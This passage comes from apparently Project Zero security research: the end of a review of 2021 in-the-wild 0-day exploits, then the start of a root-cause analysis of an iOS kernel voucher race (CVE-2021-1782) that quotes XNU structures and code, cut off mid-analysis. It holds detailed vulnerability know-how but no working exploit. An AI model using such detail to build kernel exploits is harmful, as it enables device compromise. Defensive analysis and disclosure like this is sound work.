Similar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. CVE-2021-1732 is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn’t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, CVE-2022-21882, is due to CVE-2021-1732 actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. CVE-2021-40449 is a use-after-free in NtGdiResetDC due to the object being freed during the user callback.

iOS/macOS

As discussed in the “More disclosure” section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day (CVE-2021-30869) was also found. In this section we’re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).

Bar graph showing the number of macOS and iOS itw 0-days discovered per year. macOs is 0 for every year except 2021 when 1 was discovered. iOS - 2015: 0, 2016: 2, 2017: 0, 2018: 2, 2019: 0, 2020: 3, 2021: 5. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

For the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:

These 4 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used CVE-2016-4654, a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen’s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP.  It’s a popular attack surface because historically it’s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. CVE-2021-30807 is an out-of-bounds read and CVE-2021-30883 is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 0-day in IOMobileFrameBuffer, CVE-2022-22587.

One iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel and both vulnerabilities were in code related to XNU’s inter-process communication (IPC) functionality. CVE-2021-1782 exploited a vulnerability in mach vouchers while CVE-2021-30869 exploited a vulnerability in mach messages. This is not the first time we’ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. CVE-2019-6625 was exploited as a part of an exploit chain targeting iOS 11.4.1-12.1.2 and was also a vulnerability in mach vouchers.

Mach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: CVE-2020-27932 & CVE-2020-27950. This year’s CVE-2021-30869 is a pretty close variant to 2020’s CVE-2020-27932. Tielei Wang and Xinru Chi actually presented on this vulnerability at zer0con 2021 in April 2021. In their presentation, they explained that they found it while doing variant analysis on CVE-2020-27932. TieLei Wang explained via Twitter that they had found the vulnerability in December 2020 and had noticed it was fixed in beta versions of iOS 14.4 and macOS 11.2 which is why they presented it at Zer0Con. The in-the-wild exploit only targeted macOS 10, but used the same exploitation technique as the one presented.

The two FORCEDENTRY exploits (CVE-2021-30860 and the sandbox escape) were the only times that made us all go “wow!” this year. For CVE-2021-30860, the integer overflow in CoreGraphics, it was because:

  1. For years we’ve all heard about how attackers are using 0-click iMessage bugs and finally we have a public example, and
  2. The exploit was an impressive work of art.

The sandbox escape (CVE requested, not yet assigned) was impressive because it’s one of the few times we’ve seen a sandbox escape in-the-wild that uses only logic bugs, rather than the standard memory corruption bugs.

For CVE-2021-30860, the vulnerability itself wasn’t especially notable: a classic integer overflow within the JBIG2 parser of the CoreGraphics PDF decoder. The exploit, though, was described by Samuel Groß & Ian Beer as “one of the most technically sophisticated exploits [they]’ve ever seen”. Their blogpost shares all the details, but the highlight is that the exploit uses the logical operators available in JBIG2 to build NAND gates which are used to build its own computer architecture. The exploit then writes the rest of its exploit using that new custom architecture. From their blogpost:

        

Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

This is an example of what making 0-day exploitation hard could look like: attackers having to develop a new and novel way to exploit a bug and that method requires lots of expertise and/or time to develop. This year, the two FORCEDENTRY exploits were the only 0-days out of the 58 that really impressed us. Hopefully in the future, the bar has been raised such that this will be required for any successful exploitation.

Android

There were 7 Android in-the-wild 0-days detected and disclosed this year. Prior to 2021 there had only been 1 and it was in 2019: CVE-2019-2215. Like WebKit, this lack of data makes it hard for us to assess trends and changes. Instead, we’ll compare it to public security research.

For the 7 Android 0-days they targeted the following components:

5 of the 7 0-days from 2021 targeted GPU drivers. This is actually not that surprising when we consider the evolution of the Android ecosystem as well as recent public security research into Android. The Android ecosystem is quite fragmented: many different kernel versions, different manufacturer customizations, etc. If an attacker wants a capability against “Android devices”, they generally need to maintain many different exploits to have a decent percentage of the Android ecosystem covered. However, if the attacker chooses to target the GPU kernel driver instead of another component, they will only need to have two exploits since most Android devices use 1 of 2 GPUs: either the Qualcomm Adreno GPU or the ARM Mali GPU.

Public security research mirrored this choice in the last couple of years as well. When developing full exploit chains (for defensive purposes) to target Android devices, Guang Gong, Man Yue Mo, and Ben Hawkes all chose to attack the GPU kernel driver for local privilege escalation. Seeing the in-the-wild 0-days also target the GPU was more of a confirmation rather than a revelation. Of the 5 0-days targeting GPU drivers, 3 were in the Qualcomm Adreno driver and 2 in the ARM Mali driver.

The two non-GPU driver 0-days (CVE-2021-0920 and CVE-2021-1048) targeted the upstream Linux kernel. Unfortunately, these 2 bugs shared a singular characteristic with the Android in-the-wild 0-day seen in 2019: all 3 were previously known upstream before their exploitation in Android. While the sample size is small, it’s still quite striking to see that 100% of the known in-the-wild Android 0-days that target the kernel are bugs that actually were known about before their exploitation.

The vulnerability now referred to as CVE-2021-0920 was actually found in September 2016 and discussed on the Linux kernel mailing lists. A patch was even developed back in 2016, but it didn’t end up being submitted. The bug was finally fixed in the Linux kernel in July 2021 after the detection of the in-the-wild exploit targeting Android. The patch then made it into the Android security bulletin in November 2021.

CVE-2021-1048 remained unpatched in Android for 14 months after it was patched in the Linux kernel. The Linux kernel was actually only vulnerable to the issue for a few weeks, but due to Android patching practices, that few weeks became almost a year for some Android devices. If an Android OEM synced to the upstream kernel, then they likely were patched against the vulnerability at some point. But many devices, such as recent Samsung devices, had not and thus were left vulnerable.

Microsoft Exchange Server

In 2021, there were 5 in-the-wild 0-days targeting Microsoft Exchange Server. This is the first time any Exchange Server in-the-wild 0-days have been detected and disclosed since we began tracking in-the-wild 0-days. The first four (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065)  were all disclosed and patched at the same time and used together in a single operation. The fifth (CVE-2021-42321) was patched on its own in November 2021. CVE-2021-42321 was demonstrated at Tianfu Cup and then discovered in-the-wild by Microsoft. While no other in-the-wild 0-days were disclosed as part of the chain with CVE-2021-42321, the attackers would have required at least another 0-day for successful exploitation since CVE-2021-42321 is a post-authentication bug.

Of the four Exchange in-the-wild 0-days used in the first campaign, CVE-2021-26855, which is also known as “ProxyLogon”, is the only one that’s pre-auth. CVE-2021-26855 is a server side request forgery (SSRF) vulnerability that allows unauthenticated attackers to send arbitrary HTTP requests as the Exchange server. The other three vulnerabilities were post-authentication. For example, CVE-2021-26858 and CVE-2021-27065 allowed attackers to write arbitrary files to the system. CVE-2021-26857 is a remote code execution vulnerability due to a deserialization bug in the Unified Messaging service. This allowed attackers to run code as the privileged SYSTEM user.

For the second campaign, CVE-2021-42321, like CVE-2021-26858, is a post-authentication RCE vulnerability due to insecure deserialization. It seems that while attempting to harden Exchange, Microsoft inadvertently introduced another deserialization vulnerability.

While there were a significant amount of 0-days in Exchange detected and disclosed in 2021, it’s important to remember that they were all used as 0-day in only two different campaigns. This is an example of why we don’t suggest using the number of 0-days in a product as a metric to assess the security of a product. Requiring the use of four 0-days for attackers to have success is preferable to an attacker only needing one 0-day to successfully gain access.

While this is the first time Exchange in-the-wild 0-days have been detected and disclosed since Project Zero began our tracking, this is not unexpected. In 2020 there was n-day exploitation of Exchange Servers. Whether this was the first year that attackers began the 0-day exploitation or if this was the first year that defenders began detecting the 0-day exploitation, this is not an unexpected evolution and we’ll likely see it continue into 2022.

Outstanding Questions

While there has been progress on detection and disclosure, that progress has shown just how much work there still is to do. The more data we gained, the more questions that arose about biases in detection, what we’re missing and why, and the need for more transparency from both vendors and researchers.

Until the day that attackers decide to happily share all their exploits with us, we can’t fully know what percentage of 0-days are publicly known about. However when we pull together our expertise as security researchers and anecdotes from others in the industry, it paints a picture of some of the data we’re very likely missing. From that, these are some of the key questions we’re asking ourselves as we move into 2022:

Where are the [x] 0-days?

Despite the number of 0-days found in 2021, there are key targets missing from the 0-days discovered. For example, we know that messaging applications like WhatsApp, Signal, Telegram, etc. are targets of interest to attackers and yet there’s only 1 messaging app, in this case iMessage, 0-day found this past year. Since we began tracking in mid-2014 the total is two: a WhatsApp 0-day in 2019 and this iMessage 0-day found in 2021.

Along with messaging apps, there are other platforms/targets we’d expect to see 0-days targeting, yet there are no or very few public examples. For example, since mid-2014 there’s only one in-the-wild 0-day each for macOS and Linux. There are no known in-the-wild 0-days targeting cloud, CPU vulnerabilities, or other phone components such as the WiFi chip or the baseband.

This leads to the question of whether these 0-days are absent due to lack of detection, lack of disclosure, or both?

Do some vendors have no known in-the-wild 0-days because they’ve never been found or because they don’t publicly disclose?

Unless a vendor has told us that they will publicly disclose exploitation status for all vulnerabilities in their platforms, we, the public, don’t know if the absence of an annotation means that there is no known exploitation of a vulnerability or if there is, but the vendor is just not sharing that information publicly. Thankfully this question is something that has a pretty clear solution: all device and software vendors agreeing to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited in-the-wild.

Are we seeing the same bug patterns because that’s what we know how to detect?

As we described earlier in this report, all the 0-days we saw in 2021 had similarities to previously seen vulnerabilities. This leads us to wonder whether or not that’s actually representative of what attackers are using. Are attackers actually having success exclusively using vulnerabilities in bug classes and components that are previously public? Or are we detecting all these 0-days with known bug patterns because that’s what we know how to detect? Public security research would suggest that yes, attackers are still able to have success with using vulnerabilities in known components and bug classes the majority of the time. But we’d still expect to see a few novel and unexpected vulnerabilities in the grouping. We posed this question back in the 2019 year-in-review and it still lingers.

Where are the spl0itz?

To successfully exploit a vulnerability there are two key pieces that make up that exploit: the vulnerability being exploited, and the exploitation method (how that vulnerability is turned into something useful).

Unfortunately, this report could only really analyze one of these components: the vulnerability. Out of the 58 0-days, only 5 have an exploit sample publicly available. Discovered in-the-wild 0-days are the failure case for attackers and a key opportunity for defenders to learn what attackers are doing and make it harder, more time-intensive, more costly, to do it again. Yet without the exploit sample or a detailed technical write-up based upon the sample, we can only focus on fixing the vulnerability rather than also mitigating the exploitation method. This means that attackers are able to continue to use their existing exploit methods rather than having to go back to the design and development phase to build a new exploitation method. While acknowledging that sharing exploit samples can be challenging (we have that challenge too!), we hope in 2022 there will be more sharing of exploit samples or detailed technical write-ups so that we can come together to use every possible piece of information to make it harder for the attackers to exploit more users.

As an aside, if you have an exploit sample that you’re willing to share with us, please reach out. Whether it’s sharing with us and having us write a detailed technical description and analysis or having us share it publicly, we’d be happy to work with you.

Conclusion

Looking back on 2021, what comes to mind is “baby steps”. We can see clear industry improvement in the detection and disclosure of 0-day exploits. But the better detection and disclosure has highlighted other opportunities for progress. As an industry we’re not making 0-day hard. Attackers are having success using vulnerabilities similar to what we’ve seen previously and in components that have previously been discussed as attack surfaces.The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method.  And while we made distinct progress in detection and disclosure it has shown us areas where that can continue to improve.

While this all may seem daunting, the promising part is that we’ve done it before: we have made clear progress on previously daunting goals. In 2019, we discussed the large detection deficit for 0-day exploits and 2 years later more than double were detected and disclosed. So while there is still plenty more work to do, it’s a tractable problem. There are concrete steps that the tech and security industries can take to make it even more progress:

  1. Make it an industry standard behavior for all vendors to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited,
  2. Vendors and security researchers sharing exploit samples or detailed descriptions of the exploit techniques.
  3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.

Through 2021 we continually saw the real world impacts of the use of 0-day exploits against users and entities. Amnesty International, the Citizen Lab, and others highlighted over and over how governments were using commercial surveillance products against journalists, human rights defenders, and government officials. We saw many enterprises scrambling to remediate and protect themselves from the Exchange Server 0-days. And we even learned of peer security researchers being targeted by North Korean government hackers. While the majority of people on the planet do not need to worry about their own personal risk of being targeted with 0-days, 0-day exploitation still affects us all. These 0-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful in these attacks.

2021 showed us we’re on the right track and making progress, but there’s plenty more to be done to make 0-day hard.

CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers

By: Anonymous
14 April 2022 at 15:58

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability exploited in the wild and patched in early 2021. Like the writeup published last week looking at an ASN.1 parser bug, this blog post is based on the notes I took as I was analyzing the patch and trying to understand the XNU vouchers subsystem. I hope that this writeup serves as the missing documentation for how some of the internals of the voucher subsystem works and its quirks which lead to this vulnerability.

CVE-2021-1782 was fixed in iOS 14.4, as noted by @s1guza on twitter:

"So iOS 14.4 added locks around this code bit (user_data_get_value() in ipc_voucher.c). "e_made" seems to function as a refcount, and you should be able to race this with itself and cause some refs to get lost, eventually giving you a double free"

This vulnerability was fixed on January 26th 2021, and Apple updated the iOS 14.4 release notes on May 28th 2021 to indicate that the issue may have been actively exploited:

Kernel. Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Impact: A Malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited. Description: A race condition was addressed with improved locking. CVE-2021-1772: an anonymous researcher. Entry updated May 28, 2021

Vouchers

What exactly is a voucher?

The kernel code has a concise description:

Vouchers are a reference counted immutable (once-created) set of indexes to particular resource manager attribute values (which themselves are reference counted).

That definition is technically correct, though perhaps not all that helpful by itself.

To actually understand the root cause and exploitability of this vulnerability is going to require covering a lot of the voucher codebase. This part of XNU is pretty obscure, and pretty complicated.

A voucher is a reference-counted table of keys and values. Pointers to all created vouchers are stored in the global ivht_bucket hash table.

For a particular set of keys and values there should only be one voucher object. During the creation of a voucher there is a deduplication stage where the new voucher is compared against all existing vouchers in the hashtable to ensure they remain unique, returning a reference to the existing voucher if a duplicate has been found.

Here's the structure of a voucher:

struct ipc_voucher {

  iv_index_t     iv_hash;        /* checksum hash */

  iv_index_t     iv_sum;         /* checksum of values */

  os_refcnt_t    iv_refs;        /* reference count */

  iv_index_t     iv_table_size;  /* size of the voucher table */

  iv_index_t     iv_inline_table[IV_ENTRIES_INLINE];

  iv_entry_t     iv_table;       /* table of voucher attr entries */

  ipc_port_t     iv_port;        /* port representing the voucher */

  queue_chain_t  iv_hash_link;   /* link on hash chain */

};

 

#define IV_ENTRIES_INLINE MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN

The voucher codebase is written in a very generic, extensible way, even though its actual use and supported feature set is quite minimal.

Keys

Keys in vouchers are not arbitrary. Keys are indexes into a voucher's iv_table; a value's position in the iv_table table determines what "key" it was stored under. Whilst the vouchers codebase supports the runtime addition of new key types this feature isn't used and there are just a small number of fixed, well-known keys:

#define MACH_VOUCHER_ATTR_KEY_ALL ((mach_voucher_attr_key_t)~0)

#define MACH_VOUCHER_ATTR_KEY_NONE ((mach_voucher_attr_key_t)0)

 

/* other well-known-keys will be added here */

#define MACH_VOUCHER_ATTR_KEY_ATM ((mach_voucher_attr_key_t)1)

#define MACH_VOUCHER_ATTR_KEY_IMPORTANCE ((mach_voucher_attr_key_t)2)

#define MACH_VOUCHER_ATTR_KEY_BANK ((mach_voucher_attr_key_t)3)

#define MACH_VOUCHER_ATTR_KEY_PTHPRIORITY ((mach_voucher_attr_key_t)4)

 

#define MACH_VOUCHER_ATTR_KEY_USER_DATA ((mach_voucher_attr_key_t)7)

 

#define MACH_VOUCHER_ATTR_KEY_TEST ((mach_voucher_attr_key_t)8)

 

#define MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN MACH_VOUCHER_ATTR_KEY_TEST

The iv_inline_table in an ipc_voucher has 8 entries. But of those, only four are actually supported and have any associated functionality. The ATM voucher attributes are deprecated and the code supporting them is gone so only IMPORTANCE (2), BANK (3), PTHPRIORITY (4) and USER_DATA (7) are valid keys. There's some confusion (perhaps on my part) about when exactly you should use the term key and when attribute; I'll use them interchangeably to refer to these key values and the corresponding "types" of values which they manage. More on that later.

Values

Each entry in a voucher iv_table is an iv_index_t:

typedef natural_t iv_index_t;

Each value is again an index; this time into a per-key cache of values, abstracted as a "Voucher Attribute Cache Control Object" represented by this structure:

struct ipc_voucher_attr_control {

os_refcnt_t   ivac_refs;

boolean_t     ivac_is_growing;      /* is the table being grown */

ivac_entry_t  ivac_table;           /* table of voucher attr value entries */

iv_index_t    ivac_table_size;      /* size of the attr value table */

iv_index_t    ivac_init_table_size; /* size of the attr value table */

iv_index_t    ivac_freelist;        /* index of the first free element */

ipc_port_t    ivac_port;            /* port for accessing the cache control  */

lck_spin_t    ivac_lock_data;

iv_index_t    ivac_key_index;       /* key index for this value */

};

These are accessed indirectly via another global table:

static ipc_voucher_global_table_element iv_global_table[MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN];

(Again, the comments in the code indicate that in the future that this table may grow in size and allow attributes to be managed in userspace, but for now it's just a fixed size array.)

Each element in that table has this structure:

typedef struct ipc_voucher_global_table_element {

        ipc_voucher_attr_manager_t      ivgte_manager;

        ipc_voucher_attr_control_t      ivgte_control;

        mach_voucher_attr_key_t         ivgte_key;

} ipc_voucher_global_table_element;

Both the iv_global_table and each voucher's iv_table are indexed by (key-1), not key, so the userdata entry is [6], not [7], even though the array still has 8 entries.

The ipc_voucher_attr_control_t provides an abstract interface for managing "values" and the ipc_voucher_attr_manager_t provides the "type-specific" logic to implement the semantics of each type (here by type I mean "key" or "attr" type.) Let's look more concretely at what that means. Here's the definition of ipc_voucher_attr_manager_t:

struct ipc_voucher_attr_manager {

  ipc_voucher_attr_manager_release_value_t    ivam_release_value;

  ipc_voucher_attr_manager_get_value_t        ivam_get_value;

  ipc_voucher_attr_manager_extract_content_t  ivam_extract_content;

  ipc_voucher_attr_manager_command_t          ivam_command;

  ipc_voucher_attr_manager_release_t          ivam_release;

  ipc_voucher_attr_manager_flags              ivam_flags;

};

ivam_flags is an int containing some flags; the other five fields are function pointers which define the semantics of the particular attr type. Here's the ipc_voucher_attr_manager structure for the user_data type:

const struct ipc_voucher_attr_manager user_data_manager = {

  .ivam_release_value =   user_data_release_value,

  .ivam_get_value =       user_data_get_value,

  .ivam_extract_content = user_data_extract_content,

  .ivam_command =         user_data_command,

  .ivam_release =         user_data_release,

  .ivam_flags =           IVAM_FLAGS_NONE,

};

Those five function pointers are the only interface from the generic voucher code into the type-specific code. The interface may seem simple but there are some tricky subtleties in there; we'll get to that later!

Let's go back to the generic ipc_voucher_attr_control structure which maintains the "values" for each key in a type-agnostic way. The most important field is ivac_entry_t  ivac_table, which is an array of ivac_entry_s's. It's an index into this table which is stored in each voucher's iv_table.

Here's the structure of each entry in that table:

struct ivac_entry_s {

  iv_value_handle_t ivace_value;

  iv_value_refs_t   ivace_layered:1,   /* layered effective entry */

                    ivace_releasing:1, /* release in progress */

                    ivace_free:1,      /* on freelist */

                    ivace_persist:1,   /* Persist the entry, don't

                                           count made refs */

                    ivace_refs:28;     /* reference count */

  union {

    iv_value_refs_t ivaceu_made;       /* made count (non-layered) */

    iv_index_t      ivaceu_layer;      /* next effective layer

                                          (layered) */

  } ivace_u;

  iv_index_t        ivace_next;        /* hash or freelist */

  iv_index_t        ivace_index;       /* hash head (independent) */

};

ivace_refs is a reference count for this table index. Note that this entry is inline in an array; so this reference count going to zero doesn't cause the ivac_entry_s to be free'd back to a kernel allocator (like the zone allocator for example.) Instead, it moves this table index onto a freelist of empty entries. The table can grow but never shrink.

Table entries which aren't free store a type-specific "handle" in ivace_value. Here's the typedef chain for that type:

iv_value_handle_t ivace_value

typedef mach_voucher_attr_value_handle_t iv_value_handle_t;

typedef uint64_t mach_voucher_attr_value_handle_t;

The handle is a uint64_t but in reality the attrs can (and do) store pointers there, hidden behind casts.

A guarantee made by the attr_control is that there will only ever be one (live) ivac_entry_s for a particular ivace_value. This means that each time a new ivace_value needs an ivac_entry the attr_control's ivac_table needs to be searched to see if a matching value is already present. To speed this up in-use ivac_entries are linked together in hash buckets so that a (hopefully significantly) shorter linked-list of entries can be searched rather than a linear scan of the whole table. (Note that it's not a linked-list of pointers; each link in the chain is an index into the table.)

Userdata attrs

user_data is one of the four types of supported, implemented voucher attr types. It's only purpose is to manage buffers of arbitrary, user controlled data. Since the attr_control performs deduping only on the ivace_value (which is a pointer) the userdata attr manager is responsible for ensuring that userdata values which have identical buffer values (matching length and bytes) have identical pointers.

To do this it maintains a hash table of user_data_value_element structures, which wrap a variable-sized buffer of bytes:

struct user_data_value_element {

  mach_voucher_attr_value_reference_t e_made;

  mach_voucher_attr_content_size_t    e_size;

  iv_index_t                          e_sum;

  iv_index_t                          e_hash;

  queue_chain_t                       e_hash_link;

  uint8_t                             e_data[];

};

Each inline e_data buffer can be up to 16KB. e_hash_link stores the hash-table bucket list pointer.

e_made is not a simple reference count. Looking through the code you'll notice that there are no places where it's ever decremented. Since there should (nearly) always be a 1:1 mapping between an ivace_entry and a user_data_value_element this structure shouldn't need to be reference counted. There is however one very fiddly race condition (which isn't the race condition which causes the vulnerability!) which necessitates the e_made field. This race condition is sort-of documented and we'll get there eventually...

Recipes

The host_create_mach_voucher host port MIG (Mach Interface Generator) method is the userspace interface for creating vouchers:

kern_return_t

host_create_mach_voucher(mach_port_name_t host,

    mach_voucher_attr_raw_recipe_array_t recipes,

    mach_voucher_attr_recipe_size_t recipesCnt,

    mach_port_name_t *voucher);

recipes points to a buffer filled with a sequence of packed variable-size mach_voucher_attr_recipe_data structures:

typedef struct mach_voucher_attr_recipe_data {

  mach_voucher_attr_key_t            key;

  mach_voucher_attr_recipe_command_t command;

  mach_voucher_name_t                previous_voucher;

  mach_voucher_attr_content_size_t   content_size;

  uint8_t                            content[];

} mach_voucher_attr_recipe_data_t;

key is one of the four supported voucher attr types we've seen before (importance, bank, pthread_priority and user_data) or a wildcard value (MACH_VOUCHER_ATTR_KEY_ALL) indicating that the command should apply to all keys. There are a number of generic commands as well as type-specific commands. Commands can optionally refer to existing vouchers via the previous_voucher field, which should name a voucher port.

Here are the supported generic commands for voucher creation:

MACH_VOUCHER_ATTR_COPY: copy the attr value from the previous voucher. You can specify the wildcard key to copy all the attr values from the previous voucher.

MACH_VOUCHER_ATTR_REMOVE: remove the specified attr value from the voucher under construction. This can also remove all the attributes from the voucher under construction (which, arguably, makes no sense.)

MACH_VOUCHER_ATTR_SET_VALUE_HANDLE: this command is only valid for kernel clients; it allows the caller to specify an arbitrary ivace_value, which doesn't make sense for userspace and shouldn't be reachable.

MACH_VOUCHER_ATTR_REDEEM: the semantics of redeeming an attribute from a previous voucher are not defined by the voucher code; it's up to the individual managers to determine what that might mean.

Here are the attr-specific commands for voucher creation for each type:

bank:

MACH_VOUCHER_ATTR_BANK_CREATE

MACH_VOUCHER_ATTR_BANK_MODIFY_PERSONA

MACH_VOUCHER_ATTR_AUTO_REDEEM

MACH_VOUCHER_ATTR_SEND_PREPROCESS

importance:

MACH_VOUCHER_ATTR_IMPORTANCE_SELF

user_data:

MACH_VOUCHER_ATTR_USER_DATA_STORE

pthread_priority:

MACH_VOUCHER_ATTR_PTHPRIORITY_CREATE

Note that there are further commands which can be "executed against" vouchers via the mach_voucher_attr_command MIG method which calls the attr manager's        ivam_command function pointer. Those are:

bank:

BANK_ORIGINATOR_PID

BANK_PERSONA_TOKEN

BANK_PERSONA_ID

importance:

MACH_VOUCHER_IMPORTANCE_ATTR_DROP_EXTERNAL

user_data:

none

pthread_priority:

none

Let's look at example recipe for creating a voucher with a single user_data attr, consisting of the 4 bytes {0x41, 0x41, 0x41, 0x41}:

struct udata_dword_recipe {

  mach_voucher_attr_recipe_data_t recipe;

  uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

Let's follow the path of this recipe in detail.

Here's the most important part of host_create_mach_voucher showing the three high-level phases: voucher allocation, attribute creation and voucher de-duping. It's not the responsibility of this code to find or allocate a mach port for the voucher; that's done by the MIG layer code.

/* allocate new voucher */

voucher = iv_alloc(ivgt_keys_in_use);

if (IV_NULL == voucher) {

  return KERN_RESOURCE_SHORTAGE;

}

 /* iterate over the recipe items */

while (0 < recipe_size - recipe_used) {

  ipc_voucher_t prev_iv;

  if (recipe_size - recipe_used < sizeof(*sub_recipe)) {

    kr = KERN_INVALID_ARGUMENT;

    break;

  }

  /* find the next recipe */

  sub_recipe =

    (mach_voucher_attr_recipe_t)(void *)&recipes[recipe_used];

  if (recipe_size - recipe_used - sizeof(*sub_recipe) <

      sub_recipe->content_size) {

    kr = KERN_INVALID_ARGUMENT;

    break;

  }

  recipe_used += sizeof(*sub_recipe) + sub_recipe->content_size;

  /* convert voucher port name (current space) */

  /* into a voucher reference */

  prev_iv =

    convert_port_name_to_voucher(sub_recipe->previous_voucher);

  if (MACH_PORT_NULL != sub_recipe->previous_voucher &&

      IV_NULL == prev_iv) {

    kr = KERN_INVALID_CAPABILITY;

    break;

  }

  kr = ipc_execute_voucher_recipe_command(

         voucher,

         sub_recipe->key,

         sub_recipe->command,

         prev_iv,

         sub_recipe->content,

         sub_recipe->content_size,

         FALSE);

  ipc_voucher_release(prev_iv);

  if (KERN_SUCCESS != kr) {

    break;

  }

}

if (KERN_SUCCESS == kr) {

  *new_voucher = iv_dedup(voucher);

} else {

  *new_voucher = IV_NULL;

  iv_dealloc(voucher, FALSE);

}

At the top of this snippet a new voucher is allocated in iv_alloc. ipc_execute_voucher_recipe_command is then called in a loop to consume however many sub-recipe structures were provided by userspace. Each sub-recipe can optionally refer to an existing voucher via the sub-recipe previous_voucher field. Note that MIG doesn't natively support variable-sized structures containing ports so it's passed as a mach port name which is looked up in the calling task's mach port namespace and converted to a voucher reference by convert_port_name_to_voucher. The intended functionality here is to be able to refer to attrs in other vouchers to copy or "redeem" them. As discussed, the semantics of redeeming a voucher attr isn't defined by the abstract voucher code and it's up to the individual attr managers to decide what that means.

Once the entire recipe has been consumed and all the iv_table entries filled in, iv_dedup then searches the ivht_bucket hash table to see if there's an existing voucher with a matching set of attributes. Remember that each attribute value stored in a voucher is an index into the attribute controller's attribute table; and those attributes are unique, so it suffices to simply compare the array of voucher indexes to determine whether all attribute values are equal. If a matching voucher is found, iv_dedup returns a reference to the existing voucher and calls iv_dealloc to free the newly created newly-created voucher. Otherwise, if no existing, matching voucher is found, iv_dedup adds the newly created voucher to the ivht_bucket hash table.

Let's look at ipc_execute_voucher_recipe_command which is responsible for filling in the requested entries in the voucher iv_table. Note that key and command are arbitrary, controlled dwords. content is a pointer to a buffer of controlled bytes, and content_size is the correct size of that input buffer. The MIG layer limits the overall input size of the recipe (which is a collection of sub-recipes) to 5260 bytes, and any input content buffers would have to fit in there.

static kern_return_t

ipc_execute_voucher_recipe_command(

  ipc_voucher_t                      voucher,

  mach_voucher_attr_key_t            key,

  mach_voucher_attr_recipe_command_t command,

  ipc_voucher_t                      prev_iv,

  mach_voucher_attr_content_t        content,

  mach_voucher_attr_content_size_t   content_size,

  boolean_t                          key_priv)

{

  iv_index_t prev_val_index;

  iv_index_t val_index;

  kern_return_t kr;

  switch (command) {

MACH_VOUCHER_ATTR_USER_DATA_STORE isn't one of the switch statement case values here so the code falls through to the default case:

        default:

                kr = ipc_replace_voucher_value(voucher,

                    key,

                    command,

                    prev_iv,

                    content,

                    content_size);

                if (KERN_SUCCESS != kr) {

                        return kr;

                }

                break;

        }

        return KERN_SUCCESS;

Here's that code:

static kern_return_t

ipc_replace_voucher_value(

        ipc_voucher_t                           voucher,

        mach_voucher_attr_key_t                 key,

        mach_voucher_attr_recipe_command_t      command,

        ipc_voucher_t                           prev_voucher,

        mach_voucher_attr_content_t             content,

        mach_voucher_attr_content_size_t        content_size)

{

...

        /*

         * Get the manager for this key_index.

         * Returns a reference on the control.

         */

        key_index = iv_key_to_index(key);

        ivgt_lookup(key_index, TRUE, &ivam, &ivac);

        if (IVAM_NULL == ivam) {

                return KERN_INVALID_ARGUMENT;

        }

..

iv_key_to_index just subtracts 1 from key (assuming it's valid and not MACH_VOUCHER_ATRR_KEY_ALL):

static inline iv_index_t

iv_key_to_index(mach_voucher_attr_key_t key)

{

        if (MACH_VOUCHER_ATTR_KEY_ALL == key ||

            MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN < key) {

                return IV_UNUSED_KEYINDEX;

        }

        return (iv_index_t)key - 1;

}

ivgt_lookup then gets a reference on that key's attr manager and attr controller. The manager is really just a bunch of function pointers which define the semantics of what different "key types" actually mean; and the controller stores (and caches) values for those keys.

Let's keep reading ipc_replace_voucher_value. Here's the next statement:

        /* save the current value stored in the forming voucher */

